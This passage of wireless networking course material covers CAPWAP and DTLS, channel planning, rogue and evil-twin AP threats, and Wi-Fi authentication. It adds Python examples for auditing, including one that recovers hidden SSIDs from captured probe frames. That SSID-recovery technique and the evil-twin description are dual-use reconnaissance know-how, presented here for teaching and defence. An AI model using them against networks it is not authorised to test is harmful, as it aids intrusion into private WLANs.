configured to not broadcast beacon frames.

A wireless client could also send a probe request without an SSID name to discover nearby WLAN networks.
APs configured to broadcast beacon frames would respond to the wireless client with a probe response and
provide the SSID name. APs with the broadcast SSID feature disabled do not respond to these wildcard
probes, but they do answer a probe request that names them, and both that request and the response carry
the SSID in cleartext.

12.3.8 Check Your Understanding – WLAN Operation

12.4 CAPWAP Operation

12.4.1 Video – CAPWAP

In the previous topic you learned about WLAN operation. Now you will learn about Control and Provisioning of
Wireless Access Points (CAPWAP).

Click Play to view a video about Control and Provisioning of Wireless Access Points (CAPWAP) protocol

12.4.2 Introduction to CAPWAP

CAPWAP is an IETF standard protocol (RFC 5415, with the 802.11 binding in RFC 5416) that enables a WLC
to manage multiple APs and WLANs. CAPWAP is also responsible for the encapsulation and forwarding of
WLAN client traffic between an AP and a WLC.

CAPWAP is based on LWAPP but adds additional security with Datagram Transport Layer Security (DTLS).
CAPWAP establishes tunnels on User Datagram Protocol (UDP) ports. CAPWAP can operate either over IPv4
or IPv6, as shown in the figure, but uses IPv4 by default.

IPv4 and IPv6 both use UDP ports 5246 and 5247. Port 5246 carries the CAPWAP control messages used by the
WLC to manage the AP. Port 5247 is used by CAPWAP to encapsulate data packets traveling to and from
wireless clients. However, the two address families use different transport protocol numbers in the IP header:
CAPWAP over IPv4 uses IP protocol 17 (UDP), while CAPWAP over IPv6 uses IP protocol 136 (UDP-Lite,
which checksums only the headers). Firewall rules between the APs and the WLC must allow both ports and
the correct protocol number, or the APs will never join.

12.4.3 Split MAC Architecture

A key component of CAPWAP is the concept of a split media access control (MAC). The CAPWAP split MAC
concept takes all of the functions normally performed by individual APs and distributes them between two
functional components:

• AP MAC Functions
• WLC MAC Functions

The table shows some of the MAC functions performed by each.

AP MAC Functions
• Beacons and probe responses
• Packet acknowledgements and retransmissions
• Frame queueing and packet prioritization
• MAC layer data encryption and decryption

WLC (WLAN Controller) MAC Functions
• Authentication
• Association and re-association of roaming clients
• Frame translation to other protocols
• Termination of 802.11 traffic on a wired interface

12.4.4 Datagram Transport Layer Security (DTLS) Encryption

DTLS is a protocol which provides security between the AP and the WLC. It allows them to communicate
using encryption and prevents eavesdropping or tampering.

DTLS is enabled by default to secure the CAPWAP control channel but is disabled by default for the data
channel, as shown in the figure. All CAPWAP management and control traffic exchanged between an AP and
WLC is encrypted and secured by default to provide control plane privacy and prevent Man-In-the-Middle
(MITM) attacks.

CAPWAP data encryption is optional and is enabled per AP. Data encryption requires a DTLS license to be
installed on the WLC prior to being enabled on an AP. When enabled, all WLAN client traffic is encrypted at
the AP before being forwarded to the WLC and vice versa.

Note: In the split MAC model the AP is the end point of the over-the-air encryption (WPA2/WPA3), so with
data DTLS disabled, client traffic crosses the wired path between the AP and the WLC in cleartext inside the
CAPWAP tunnel, and anyone able to capture on that path can read it. Enable data DTLS whenever the
AP-to-WLC path crosses a network you do not trust, such as a WAN link to a branch office.
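An added example, not code from the module, that ties together the port and protocol numbers in 12.4.2 and the DTLS point in 12.4.4: a classifier that labels IPv4/UDP datagrams as CAPWAP control or data and reports whether each is DTLS-wrapped, using the CAPWAP preamble type defined in RFC 5415. The sample packets are constructed inline by the build_ipv4_udp() helper (there is no real capture) and the 10.0.0.x addresses are assumptions.

```python
"""Classify CAPWAP datagrams and flag a data channel running without DTLS.

Added example; not code from the module. The packets are built inline by a
small helper (IPv4 + UDP with zero checksums) to stand in for a capture.
"""
import struct

CAPWAP_CONTROL_PORT = 5246
CAPWAP_DATA_PORT = 5247
IPPROTO_UDP = 17        # CAPWAP over IPv4
IPPROTO_UDPLITE = 136   # CAPWAP over IPv6 on Cisco WLCs (UDP-Lite)


def parse_ipv4_udp(pkt):
    """Return (src, dst, proto, sport, dport, payload) from an IPv4/UDP packet."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4:
        raise ValueError("not a complete IPv4/UDP packet")
    ihl = (pkt[0] & 0xF) * 4
    proto = pkt[9]
    if proto not in (IPPROTO_UDP, IPPROTO_UDPLITE):
        raise ValueError(f"IP protocol {proto} is not UDP or UDP-Lite")
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    sport, dport = struct.unpack_from("!HH", pkt, ihl)
    return src, dst, proto, sport, dport, pkt[ihl + 8:]


def classify_capwap(pkt):
    """Label a packet as CAPWAP control or data and whether it is DTLS-wrapped.

    RFC 5415: the first byte of every CAPWAP datagram is the preamble. Its
    high nibble is the version (0) and its low nibble the type: 0 means a
    plain CAPWAP header follows, 1 means a DTLS record follows. Returns
    None for traffic that is not on a CAPWAP port.
    """
    src, dst, proto, sport, dport, payload = parse_ipv4_udp(pkt)
    if CAPWAP_CONTROL_PORT in (sport, dport):
        channel = "control"
    elif CAPWAP_DATA_PORT in (sport, dport):
        channel = "data"
    else:
        return None
    if not payload:
        raise ValueError("empty CAPWAP datagram")
    preamble_type = payload[0] & 0xF
    dtls = {0: False, 1: True}.get(preamble_type)  # None = unknown preamble type
    return {"src": src, "dst": dst, "proto": proto, "channel": channel, "dtls": dtls}


def audit_capwap(packets):
    """Return one finding per packet whose data channel is not DTLS-encrypted.

    Plain CAPWAP on the control port is normal during discovery (the Discovery
    Request/Response precede the DTLS handshake), so only data is flagged.
    """
    findings = []
    for pkt in packets:
        info = classify_capwap(pkt)
        if info and info["channel"] == "data" and info["dtls"] is False:
            findings.append(f"{info['src']} -> {info['dst']}: CAPWAP data without DTLS")
    return findings


def build_ipv4_udp(src, dst, sport, dport, payload, proto=IPPROTO_UDP):
    """Construct a minimal IPv4/UDP packet (test helper; checksums left zero)."""
    def pack_ip(addr):
        return bytes(int(x) for x in addr.split("."))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, proto, 0,
                     pack_ip(src), pack_ip(dst))
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    return ip + udp + payload


# Constructed sample traffic between APs (10.0.0.10, 10.0.0.11) and their WLC (10.0.0.1).
DTLS_HANDSHAKE = b"\x01" + b"\x16\xfe\xfd" + b"\x00" * 11   # DTLS 1.2 handshake record
DTLS_APPDATA = b"\x01" + b"\x17\xfe\xfd" + b"\x00" * 11     # DTLS 1.2 application data
PLAIN_CAPWAP = b"\x00" + b"\x10\x00\x00\x00" + b"\x00" * 4  # cleartext CAPWAP header
SAMPLE = [
    build_ipv4_udp("10.0.0.10", "10.0.0.1", 40001, CAPWAP_CONTROL_PORT, DTLS_HANDSHAKE),
    build_ipv4_udp("10.0.0.10", "10.0.0.1", 40002, CAPWAP_DATA_PORT, PLAIN_CAPWAP),
    build_ipv4_udp("10.0.0.11", "10.0.0.1", 40003, CAPWAP_DATA_PORT, DTLS_APPDATA),
    build_ipv4_udp("10.0.0.10", "10.0.0.53", 40004, 53, b"\x12\x34\x01\x00"),
]

if __name__ == "__main__":
    for line in audit_capwap(SAMPLE):
        print(line)
```

Run against a capture taken on the switch port facing the WLC, the audit lists every AP whose data channel is still in cleartext, which is the quickest way to verify that the per-AP data DTLS setting actually took effect.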

12.4.5 FlexConnect APs

FlexConnect is a wireless solution for branch office and remote office deployments. It lets you configure and
control access points in a branch office from the corporate office through a WAN link, without deploying a
controller in each office.

There are two modes of operation for the FlexConnect AP.

• Connected mode - The WLC is reachable. In this mode the FlexConnect AP has CAPWAP
connectivity with its WLC and can send traffic through the CAPWAP tunnel, as shown in the figure.
The WLC performs all its CAPWAP functions.
• Standalone mode - The WLC is unreachable. The FlexConnect AP has lost or failed to establish
CAPWAP connectivity with its WLC. In this mode, a FlexConnect AP can assume some of the WLC
functions, such as switching client data traffic locally and performing client authentication locally.

12.4.6 Check Your Understanding – CAPWAP Operation

12.5 Channel Management
12.5.1 Frequency Channel Saturation

Wireless LAN devices have transmitters and receivers tuned to specific frequencies of radio waves to
communicate. A common practice is for frequencies to be allocated as ranges. Such ranges are then split into
smaller ranges called channels.

If the demand for a specific channel is too high, that channel is likely to become oversaturated. The saturation
of the wireless medium degrades the quality of the communication. Over the years, a number of techniques
have been created to improve wireless communication and alleviate saturation. These techniques mitigate
channel saturation by using the channels in a more efficient way.

Direct-Sequence Spread Spectrum (DSSS)

This is a modulation technique designed to spread a signal over a larger frequency band. Spread spectrum
techniques were developed during war time to make it more difficult for enemies to intercept or jam a
communication signal. It does this by spreading the signal over a wider frequency, which effectively hides the
discernible peak of the signal, as shown in the figure. A properly configured receiver can reverse the DSSS
modulation and reconstruct the original signal. DSSS is used by 802.11b devices to avoid interference from
other devices using the same 2.4 GHz frequency.

Frequency-Hopping Spread Spectrum (FHSS)

This relies on spread spectrum methods to communicate. It transmits radio signals by rapidly switching a
carrier signal among many frequency channels. With the FHSS, the sender and receiver must be
synchronized to “know” which channel to jump to. This channel hopping process allows for a more efficient
usage of the channels, decreasing channel congestion. FHSS was used by the original 802.11 standard.
Walkie-talkies and 900 MHz cordless phones also use FHSS, and Bluetooth uses a variation of FHSS.

Orthogonal Frequency-Division Multiplexing (OFDM)

This is a subset of frequency division multiplexing in which a single channel uses multiple sub-channels on
adjacent frequencies. Sub-channels in an OFDM system are precisely orthogonal to one another, which allows
the sub-channels to overlap without interfering. OFDM is used by a number of communication systems
including 802.11a/g/n/ac. The newer 802.11ax uses a variation of OFDM called Orthogonal Frequency-Division
Multiple Access (OFDMA).

12.5.2 Channel Selection

A best practice for WLANs requiring multiple APs is to use non-overlapping channels. For example, the
802.11b/g/n standards operate in the 2.4 GHz to 2.5 GHz spectrum. The 2.4 GHz band is subdivided into
multiple channels. Each channel is allotted 22 MHz bandwidth and is separated from the next channel by 5
MHz. The 802.11b standard identifies 11 channels for North America, as shown in the figure (13 in Europe
and 14 in Japan).

Note: Search the internet for 2.4 GHz channels to learn more about the variations for different countries.

The figure shows 11 channels that are 22 MHz wide and 5 MHz apart. The spectrum shown is between
2.4 GHz and 2.5 GHz.

2.4 GHz Overlapping Channels in North America

Interference occurs when one signal overlaps a channel reserved for another signal, causing possible
distortion. The best practice for 2.4 GHz WLANs that require multiple APs is to use non-overlapping channels,
although most modern APs will do this automatically. If there are three adjacent APs, use channels 1, 6, and
11, as shown in the figure

2.4 GHz Non-Overlapping Channels for 802.11b/g/n

For the 5 GHz standards 802.11a/n/ac, there are 24 channels. The 5 GHz band is divided into three sections.
Each channel is separated from the next channel by 20 MHz. The figure shows all 24 Unlicensed National
Information Infrastructure (U-NII) channels for the 5 GHz band. Although there is a slight overlap at the
tails of each channel's frequency, the channels do not interfere with one another. 5 GHz wireless can provide
faster data transmission for wireless clients in heavily populated wireless networks because of the large
number of non-overlapping wireless channels.

Note: Search the internet for 5 GHz channels to learn more about the variations for different countries.

The figure shows 8 channels that are 20 MHz apart. The spectrum shown is between 5150 MHz and 5350
MHz.

5 GHz First Eight Non-Interfering Channels

As with 2.4 GHz WLANs, choose non-interfering channels when configuring multiple 5 GHz APs that are
adjacent to each other, as shown in the figure.

5 GHz Non-Interfering Channels for 802.11a/n/ac
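As an added example (not code from the module), the channel arithmetic above written out for both bands, plus a greedy assignment that gives adjacent APs non-overlapping channels. The adjacency maps FLOOR and ROOM are constructed site-survey results, and the function names are mine.

```python
"""Channel arithmetic and non-overlapping channel assignment for adjacent APs.

Added example; not code from the module. It uses the figures the module
gives: 2.4 GHz channels 22 MHz wide and 5 MHz apart, 5 GHz channels 20 MHz
apart. The AP adjacency maps are constructed site-survey results.
"""

CH24_WIDTH_MHZ = 22   # 802.11b/g/n channel width in the 2.4 GHz band
CH5_WIDTH_MHZ = 20    # basic 802.11a/n/ac channel width in the 5 GHz band


def center_24(channel):
    """Center frequency in MHz of a 2.4 GHz channel (1-13 regular, 14 Japan only)."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484
    raise ValueError(f"no 2.4 GHz channel {channel}")


def center_5(channel):
    """Center frequency in MHz of a 5 GHz channel (5000 + 5 * channel number)."""
    if not 1 <= channel <= 200:
        raise ValueError(f"no 5 GHz channel {channel}")
    return 5000 + 5 * channel


def overlaps(freq_a, freq_b, width):
    """True if two channels of the given width share any spectrum."""
    return abs(freq_a - freq_b) < width


def non_overlapping(channels, center, width):
    """Greedily pick the lowest channels that are mutually non-overlapping."""
    chosen = []
    for ch in sorted(channels):
        if all(not overlaps(center(ch), center(c), width) for c in chosen):
            chosen.append(ch)
    return chosen


def assign_channels(adjacency, channels=(1, 6, 11)):
    """Give each AP a channel that none of its overlapping neighbors uses.

    adjacency maps an AP name to the set of APs whose coverage area overlaps
    it (it must be symmetric). APs with the most neighbors are placed first.
    Raises ValueError when the channel set is too small for the layout.
    """
    assignment = {}
    for ap in sorted(adjacency, key=lambda a: -len(adjacency[a])):
        used = {assignment[n] for n in adjacency[ap] if n in assignment}
        free = [c for c in channels if c not in used]
        if not free:
            raise ValueError(f"no non-overlapping channel left for {ap}")
        assignment[ap] = free[0]
    return assignment


def conflicts(adjacency, assignment):
    """List adjacent AP pairs that ended up on the same channel (should be empty)."""
    return sorted({tuple(sorted((a, n))) for a in adjacency for n in adjacency[a]
                   if assignment[a] == assignment[n]})


# Constructed survey: four APs around a floor, each overlapping its two neighbors.
FLOOR = {"AP-NE": {"AP-NW", "AP-SE"}, "AP-NW": {"AP-NE", "AP-SW"},
         "AP-SW": {"AP-NW", "AP-SE"}, "AP-SE": {"AP-NE", "AP-SW"}}
# A conference room where three APs all hear each other.
ROOM = {"A": {"B", "C"}, "B": {"A", "C"}, "C": {"A", "B"}}

if __name__ == "__main__":
    print("2.4 GHz, channels 1-11:", non_overlapping(range(1, 12), center_24, CH24_WIDTH_MHZ))
    print("5 GHz, first eight:", non_overlapping(range(36, 65, 4), center_5, CH5_WIDTH_MHZ))
    print("floor plan:", assign_channels(FLOOR))
    print("room:", assign_channels(ROOM))
```

With only three usable 2.4 GHz channels, assign_channels() raises as soon as four APs all overlap each other; that is the signal to lower transmit power, move an AP, or push the dense area onto 5 GHz, where the same function can be handed the full non-overlapping list.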

12.5.3 Plan a WLAN Deployment

The number of users supported by a WLAN depends on the geographical layout of the facility, including the
number of bodies and devices that can fit in a space, the data rates users expect, the use of non-overlapping
channels by multiple APs in an ESS, and transmit power settings.

When planning the location of APs, the approximate circular coverage area is important (as shown in the
figure), but there are some additional recommendations:

• If APs are to use existing wiring or if there are locations where APs cannot be placed, note these locations
on the map.
• Note all potential sources of interference which can include microwave ovens, wireless video cameras,
fluorescent lights, motion detectors, or any other device that uses the 2.4 GHz range.
• Position APs above obstructions.
• Position APs vertically near the ceiling in the center of each coverage area, if possible.
• Position APs in locations where users are expected to be. For example, conference rooms are typically a
better location for APs than a hallway.
• If an IEEE 802.11 network has been configured for mixed mode, the wireless clients may experience
slower than normal speeds in order to support the older wireless standards.

When estimating the expected coverage area of an AP, realize that this value varies depending on the WLAN
standard or mix of standards that are deployed, the nature of the facility, and the transmit power that the AP is
configured for. Always consult the specifications for the AP when planning for coverage areas.

12.5.4 Check Your Understanding – Channel Management

12.6 WLAN Threats

12.6.1 Video – WLAN Threats

The previous topics covered the WLAN components and configuration. Here you will learn about WLAN
threats.

Click Play to view a video about threats to WLANs.

12.6.2 Wireless Security Overview

A WLAN is open to anyone within range of an AP who has the appropriate credentials to associate to it. With a
wireless NIC and knowledge of cracking techniques, an attacker may not have to physically enter the
workplace to gain access to a WLAN.

Attacks can be generated by outsiders, disgruntled employees, and even unintentionally by employees.
Wireless networks are specifically susceptible to several threats, including:

• Interception of data - Wireless data should be encrypted to prevent it from being read by eavesdroppers.
• Wireless intruders - Unauthorized users attempting to access network resources can be deterred through
effective authentication techniques.
• Denial of Service (DoS) Attacks - Access to WLAN services can be compromised either accidentally or
maliciously. Various solutions exist depending on the source of the DoS attack.
• Rogue APs - Unauthorized APs installed by a well-intentioned user or for malicious purposes can be detected
using management software.

12.6.3 DoS Attacks

Wireless DoS attacks can be the result of:

• Improperly configured devices - Configuration errors can disable the WLAN. For instance, an administrator
could accidentally alter a configuration and disable the network, or an intruder with administrator privileges could
intentionally disable a WLAN.
• A malicious user intentionally interfering with the wireless communication - Their goal is to disable the
wireless network completely or to the point where no legitimate device can access the medium.
• Accidental interference - WLANs are prone to interference from other wireless devices including microwave
ovens, cordless phones, baby monitors, and more, as shown in the figure. The 2.4 GHz band is more prone to
interference than the 5 GHz band.

12.6.4 Rogue Access Point

A rogue AP is an AP or wireless router that has been connected to a corporate network without explicit
authorization and against corporate policy. Anyone with access to the premises can install (maliciously or non-
maliciously) an inexpensive wireless router that can potentially allow access to a secure network resource.

Once connected, the rogue AP can be used by an attacker to capture MAC addresses, capture data packets,
gain access to network resources, or launch a man-in-the-middle attack.

A personal network hotspot could also be used as a rogue AP. For example, a user with secure network
access enables their authorized Windows host to become a Wi-Fi AP. Doing so circumvents the security
measures and other unauthorized devices can now access network resources as a shared device.

To prevent the installation of rogue APs, organizations must configure WLCs with rogue AP policies, as shown
in the figure, and use monitoring software to actively monitor the radio spectrum for unauthorized APs.

12.6.5 Man-in-the-Middle Attack

In a man-in-the-middle (MITM) attack, the attacker is positioned between two legitimate entities in order to
read or modify the data that passes between the two parties. There are many ways to create a MITM
attack.

A popular wireless MITM attack is called the “evil twin AP” attack, where an attacker introduces a rogue AP
and configures it with the same SSID as a legitimate AP, as shown in the figure. Locations offering free Wi-Fi,
such as airports, cafes, and restaurants, are particularly popular spots for this type of attack due to the open
authentication.

Figure: a threat actor at Bobs Latte has used their laptop to set up an evil twin AP with an SSID of "Bobs Latte", open authentication, and channel 6.

Wireless clients attempting to connect to a WLAN would see two APs with the same SSID offering wireless
access. Those near the rogue AP find the stronger signal and most likely associate with it. User traffic is now
sent to the rogue AP, which in turn captures the data and forwards it to the legitimate AP, as shown in the
figure. Return traffic from the legitimate AP is sent to the rogue AP, captured, and then forwarded to the
unsuspecting user. The attacker can steal the user's passwords, personal information, gain access to their
device, and compromise the system.

Defeating an attack like an MITM attack depends on the sophistication of the WLAN infrastructure and the
vigilance in monitoring activity on the network. The process begins with identifying legitimate devices on the
WLAN. To do this, users must be authenticated. After all of the legitimate devices are known, the network can
be monitored for abnormal devices or traffic. On the client side, the evil twin works because an open network
gives the client no way to tell the two APs apart; a WLAN that authenticates the AP to the client (WPA2 or
WPA3 Enterprise with server certificate validation, or WPA3-Personal's SAE exchange, which fails unless
both sides know the password) denies the attacker that free ride.
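The detection approach described here and in 12.6.4 (know the legitimate devices, then watch for everything else) can be scripted once you have an inventory of authorized BSSIDs, a feed of observed beacons, and the MAC tables from the access switches. The Python below is an added example, not code from the module or from any WLC: the AUTHORIZED inventory, the OBSERVED beacons and the WIRED_MACS table are constructed, and the severity scheme is an assumption.

```python
"""Classify observed APs as authorized, misconfigured, evil twin, rogue on the wire, or neighbor.

Added example; not code from the module. The inventory, the beacon
observations and the switch MAC table are all constructed for illustration;
the MAC addresses are made up.
"""

SECURITY_RANK = {"open": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}

# Authorized WLAN inventory: SSID -> BSSIDs allowed to advertise it and the expected security.
AUTHORIZED = {
    "CorpWiFi": {"bssids": {"00:11:22:33:44:01", "00:11:22:33:44:02"}, "security": "WPA2"},
    "CorpGuest": {"bssids": {"00:11:22:33:44:11"}, "security": "WPA2"},
}

# Beacons as a scanner or wireless IDS would report them (constructed).
OBSERVED = [
    {"ssid": "CorpWiFi", "bssid": "00:11:22:33:44:01", "channel": 1, "security": "WPA2", "rssi": -48},
    {"ssid": "CorpWiFi", "bssid": "00:11:22:33:44:02", "channel": 11, "security": "WPA2", "rssi": -55},
    {"ssid": "CorpGuest", "bssid": "00:11:22:33:44:11", "channel": 6, "security": "open", "rssi": -57},
    {"ssid": "CorpWiFi", "bssid": "de:ad:be:ef:00:01", "channel": 6, "security": "open", "rssi": -35},
    {"ssid": "CorpWiFi", "bssid": "de:ad:be:ef:00:02", "channel": 1, "security": "WPA2", "rssi": -62},
    {"ssid": "Printer-Setup", "bssid": "c0:ff:ee:00:00:01", "channel": 11, "security": "WPA2", "rssi": -60},
    {"ssid": "Neighbor-5G", "bssid": "aa:bb:cc:dd:ee:ff", "channel": 36, "security": "WPA2", "rssi": -80},
]

# MAC addresses learned on corporate switch access ports (constructed CAM table excerpt).
WIRED_MACS = {"c0:ff:ee:00:00:01": "Gi1/0/7", "00:11:22:33:44:01": "Gi1/0/1"}


def classify_ap(obs, authorized, wired_macs):
    """Return (kind, severity, detail) for one observed AP."""
    ssid, bssid = obs["ssid"], obs["bssid"]
    if ssid in authorized:
        expected = authorized[ssid]
        if bssid in expected["bssids"]:
            if obs["security"] != expected["security"]:
                return ("misconfigured", "high",
                        f"advertises {obs['security']}, expected {expected['security']}")
            return ("authorized", "info", "")
        # Same SSID from a BSSID we do not own: the evil twin pattern. Open
        # authentication where WPA2 is expected means it exists to harvest clients.
        weaker = SECURITY_RANK[obs["security"]] < SECURITY_RANK[expected["security"]]
        return ("evil-twin", "critical" if weaker else "high",
                f"unauthorized BSSID on channel {obs['channel']} with {obs['security']}, rssi {obs['rssi']}")
    if bssid in wired_macs:
        # An unknown SSID whose BSSID shows up on our own switch ports is plugged
        # into the corporate LAN: a rogue AP, not a neighbor.
        return ("rogue-on-wire", "critical", f"BSSID learned on switch port {wired_macs[bssid]}")
    return ("neighbor", "low", "unknown SSID, not seen on the wire")


def audit_wlan(observed, authorized, wired_macs):
    """Return the non-authorized findings, most severe first."""
    order = {"critical": 0, "high": 1, "low": 2, "info": 3}
    findings = []
    for obs in observed:
        kind, severity, detail = classify_ap(obs, authorized, wired_macs)
        if kind != "authorized":
            findings.append({"kind": kind, "severity": severity, "ssid": obs["ssid"],
                             "bssid": obs["bssid"], "detail": detail})
    return sorted(findings, key=lambda f: order[f["severity"]])


if __name__ == "__main__":
    for f in audit_wlan(OBSERVED, AUTHORIZED, WIRED_MACS):
        print(f"[{f['severity']}] {f['kind']}: {f['ssid']} {f['bssid']} - {f['detail']}")
```

Two caveats a real deployment has to handle: an attacker can clone the authorized BSSID as well as the SSID, so production systems also compare channel, capabilities and signal strength against the known AP; and a rogue AP's wired MAC is usually not identical to its radio BSSID, so WLC rogue detectors compare against a small range of neighbouring addresses rather than an exact match.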

12.6.6 Check Your Understanding – WLAN Threats

12.7 Secure WLANs

12.7.1 Video – Secure WLANs

The previous topic explained the WLAN threats. What can you do to secure the WLAN?

Click Play to view a video about techniques for securing WLANs.

12.7.2 SSID Cloaking and MAC Address Filtering

Wireless signals can travel through solid matter, such as ceilings, floors, walls, outside of the home, or office
space. Without stringent security measures in place, installing a WLAN can be the equivalent of putting
Ethernet ports everywhere, even outside.

To address the threats of keeping wireless intruders out and protecting data, two early security features
were used and are still available on most routers and APs: SSID cloaking and MAC address filtering.

SSID Cloaking

APs and some wireless routers allow the SSID to be hidden from the beacon frame, as shown in the figure. The
AP still sends beacons, but with an empty SSID field, so the network name does not appear in client scan lists.
Wireless clients must manually configure the SSID to connect to the network.

MAC Addresses Filtering

An administrator can manually permit or deny clients wireless access based on their physical MAC hardware
address. In the figure, the router is configured to permit two MAC addresses. Devices with different MAC
addresses will not be able to join the 2.4GHz WLAN.

12.7.3 802.11 Original Authentication Methods

Although these two features would deter most users, the reality is that neither SSID cloaking nor MAC address
filtering would deter a crafty intruder. SSIDs are easily discovered even if APs do not broadcast them, because
every directed probe request and probe response for the network carries the name in cleartext, and MAC
addresses can be changed with a single command on most operating systems. The best way to secure a
wireless network is to use authentication and encryption systems.
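To make the point concrete, here is an added example (not code from the module) that works on the management frame bodies described in 12.3.7: it recognizes a cloaked SSID in a beacon (an SSID element of length zero or all NUL bytes), then recovers the real name from the directed probe request and probe response that any connecting client triggers. The frames are constructed by the mgmt_body() helper; the addresses and the name HiddenCorp are made up.

```python
"""Recover a cloaked SSID from 802.11 management frame bodies.

Added example; not code from the module. Frames are constructed by hand:
a beacon with an empty SSID element, a directed probe request from a client,
and the AP's probe response. Only the frame body is handled here; the
transmitter address from the MAC header is passed alongside it.
"""
import struct

SUBTYPE_PROBE_REQ = 4
SUBTYPE_PROBE_RESP = 5
SUBTYPE_BEACON = 8
IE_SSID = 0
IE_SUPPORTED_RATES = 1
FIXED_PARAMS_LEN = 12  # timestamp(8) + beacon interval(2) + capability(2)


def parse_ies(body):
    """Split the tagged parameters (information elements) into (id, value) pairs."""
    ies = []
    i = 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        ies.append((eid, value))
        i += 2 + length
    return ies


def extract_ssid(subtype, body):
    """Return the SSID string, or None when the element is absent or cloaked.

    Beacons and probe responses start with 12 bytes of fixed parameters;
    probe requests begin directly with the tagged parameters.
    """
    if subtype in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        body = body[FIXED_PARAMS_LEN:]
    for eid, value in parse_ies(body):
        if eid == IE_SSID:
            # A cloaked network sends length 0 or a run of NUL bytes.
            if not value.strip(b"\x00"):
                return None
            return value.decode("utf-8", "replace")
    return None


def recover_cloaked_ssids(frames):
    """Map each BSSID that sends cloaked beacons to the name its own probe
    responses reveal, and collect the names clients ask for in directed probes.

    frames: iterable of (subtype, transmitter_mac, body) tuples.
    """
    frames = list(frames)
    cloaked = {ta for subtype, ta, body in frames
               if subtype == SUBTYPE_BEACON and extract_ssid(subtype, body) is None}
    revealed, probed = {}, set()
    for subtype, ta, body in frames:
        ssid = extract_ssid(subtype, body)
        if not ssid:
            continue
        if subtype == SUBTYPE_PROBE_RESP and ta in cloaked:
            revealed[ta] = ssid
        elif subtype == SUBTYPE_PROBE_REQ:
            probed.add(ssid)
    return revealed, probed


def ie(eid, value):
    return bytes([eid, len(value)]) + value


def mgmt_body(subtype, ssid_value):
    """Construct a management frame body for the example (test helper)."""
    fixed = b"" if subtype == SUBTYPE_PROBE_REQ else struct.pack("<QHH", 0, 100, 0x0411)
    return fixed + ie(IE_SSID, ssid_value) + ie(IE_SUPPORTED_RATES, bytes([0x82, 0x84, 0x8B, 0x96]))


AP = "02:00:00:00:a0:01"
CLIENT = "02:00:00:00:c1:01"
FRAMES = [
    (SUBTYPE_BEACON, AP, mgmt_body(SUBTYPE_BEACON, b"")),                  # cloaked beacon
    (SUBTYPE_PROBE_REQ, CLIENT, mgmt_body(SUBTYPE_PROBE_REQ, b"HiddenCorp")),   # client names it
    (SUBTYPE_PROBE_RESP, AP, mgmt_body(SUBTYPE_PROBE_RESP, b"HiddenCorp")),     # AP confirms it
]

if __name__ == "__main__":
    print(recover_cloaked_ssids(FRAMES))
```

The recovery needs no active probing at all: a passive listener only has to wait for one legitimate client to connect. That is why cloaking is an inventory convenience, not an access control.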

Two types of authentication were introduced with the original 802.11 standard:

• Open system authentication - Any wireless client should easily be able to connect and should only
be used in situations where security is of no concern, such as those providing free internet access like
cafes, hotels, and in remote areas. The wireless client is responsible for providing security such as
using a virtual private network (VPN) to connect securely. VPNs provide authentication and encryption
services. VPNs are beyond the scope of this topic.
• Shared key authentication - Provides mechanisms, such as WEP, WPA, WPA2, and WPA3, to
authenticate and encrypt data between a wireless client and AP. However, the password must be pre-
shared between both parties to connect.

Note: Strictly, the shared key authentication defined in the original standard is the WEP challenge-response
exchange, which leaks keystream to an eavesdropper and is easily broken. WPA, WPA2, and WPA3 networks
use open system authentication at the 802.11 frame level and do their real authentication afterwards, in the
4-way handshake (WPA/WPA2) or the SAE exchange (WPA3); the module groups them here because the
secret must still be pre-shared.

The following chart summarizes these authentication methods.

12.7.4 Shared Key Authentication Methods

There are four shared key authentication techniques available, as described below. Until the availability of
WPA3 devices becomes ubiquitous, wireless networks should use at least WPA2 with AES encryption.

• Wired Equivalent Privacy (WEP) - The original 802.11 specification, which secures data with the Rivest
Cipher 4 (RC4) stream cipher and a static key. Because the key never changes as packets are exchanged,
keystream reuse makes the key easy to recover. WEP is no longer recommended and should never be used.
• Wi-Fi Protected Access (WPA) - A Wi-Fi Alliance standard that keeps the RC4 cipher of WEP hardware but
wraps it in the Temporal Key Integrity Protocol (TKIP), which derives a fresh key for every packet and adds a
message integrity check. This is much harder to attack than WEP, but TKIP is itself deprecated.
• WPA2 - The current industry standard for securing wireless networks. It uses the Advanced Encryption
Standard (AES) in CCMP mode for encryption. AES-CCMP is currently considered a strong, unbroken
encryption protocol; the known weaknesses of WPA2-Personal lie in the PSK handshake, not in the cipher.
• WPA3 - The next generation of Wi-Fi security. All WPA3-enabled devices use the latest security methods,
disallow outdated legacy protocols, and require the use of Protected Management Frames (PMF). At the
time of writing, devices with WPA3 were not yet readily available.

12.7.5 Authenticating a Home User

Home routers typically have two choices for authentication: WPA and WPA2. WPA2 is the stronger of the
two. The figure shows the option to select one of two WPA2 authentication methods:

• Personal - Intended for home or small office networks, users authenticate using a pre-shared key
(PSK). Wireless clients authenticate with the wireless router using a pre-shared password. No special
authentication server is required.
• Enterprise - Intended for enterprise networks but requires a Remote Authentication Dial-In User
Service (RADIUS) authentication server. Although more complicated to set up, it provides additional
security. The AP authenticates to the RADIUS server with a shared secret, and users then authenticate
using the 802.1X standard, which uses the Extensible Authentication Protocol (EAP) for authentication.

In the figure, the administrator is configuring the wireless router with WPA2 Personal authentication on the 2.4
GHz band.

12.7.6 Encryption Methods

Encryption is used to protect data. If an intruder has captured encrypted data, they would not be able to
decipher it in any reasonable amount of time.

The WPA and WPA2 standards use the following encryption protocols:

• Temporal Key Integrity Protocol (TKIP) - TKIP is the encryption method used by WPA. It provides
support for legacy WLAN equipment by addressing the original flaws associated with the 802.11 WEP
encryption method. It keeps the RC4 cipher that WEP hardware implements, but derives a fresh per-packet
key for the Layer 2 payload and carries a Message Integrity Check (MIC, known as Michael) in the
encrypted packet to ensure the message has not been altered.
• Advanced Encryption Standard (AES) - AES is the encryption method used by WPA2. It is the preferred
